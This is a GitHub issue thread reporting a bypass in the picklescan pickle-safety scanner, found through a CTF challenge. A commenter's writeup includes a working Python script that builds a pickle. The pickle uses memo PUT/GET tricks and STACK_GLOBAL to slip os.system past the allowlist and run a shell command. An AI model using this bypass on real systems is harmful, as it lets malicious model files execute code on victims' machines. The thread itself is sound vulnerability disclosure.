### ISSUE TITLE
Possible vulnerability in picklescan==0.0.12

### ISSUE THREAD

**Issue by George-TL** [mmaitre314/picklescan#22]
Hi,

Check out the following CTF challenge:
https://imaginaryctf.org/Challenges / Misc / Safe Pickle

Dockerfile states that is uses latest version of picklescan.

Challenge code:
```
#!/usr/bin/env python3
from picklescan.scanner import scan_pickle_bytes, SafetyLevel
import io, pickle, base64

inp = input("Base64 encoded pickle: ")
pkl = base64.b64decode(inp)
result = scan_pickle_bytes(io.BytesIO(pkl), 1337)
if (
    result.scan_err
    or result.issues_count > 0
    or not all([g.safety == SafetyLevel.Innocuous for g in result.globals])
):
    print("Dangerous pickle!")
    exit()

pickle.loads(pkl)
```

**Comment by mmaitre314** [comment]
Could you clarify expected vs actual behavior? I see that there is a docker file in https://s1.fdow.nl/OOOwz-safe_pickle.tar.gz but I am not clear how that shows there is a vulnerability in picklescan and give enough details to fix it.

**Comment by programmeruser2** [comment]
I'm pretty sure the point of the challenge is to find a 0-day in the library (confirmed by the challenge author)

**Comment by George-TL** [comment]
Writeup:
The [way](https://github.com/mmaitre314/picklescan/blob/40001cd1caa9e041b1bce1b80f3707056cd8be52/src/picklescan/scanner.py#L193) picklescan handles memo doesn't look at the argument, so it is possible to have a different memo and use STACK_GLOBAL to bypass allowlist checking.
```
import pickle, base64

pkl = b''.join([
    pickle.UNICODE + b'os\n',
    pickle.PUT + b'2\n',
    pickle.POP,
    pickle.UNICODE + b'system\n',
    pickle.PUT + b'3\n',
    pickle.POP,
    pickle.UNICODE + b'torch\n',
    pickle.PUT + b'0\n',
    pickle.POP,
    pickle.UNICODE + b'LongStorage\n',
    pickle.PUT + b'1\n',
    pickle.POP,

    pickle.GET + b'2\n',
    pickle.GET + b'3\n',
    pickle.STACK_GLOBAL,

    pickle.MARK,
    pickle.UNICODE + b'cat flag.txt\n',
    pickle.TUPLE,

    pickle.REDUCE
]) + b'.'
print(base64.b64encode(pkl).decode())
```

**Comment by mmaitre314** [comment]
Thanks for the repro! Looking into a fix.
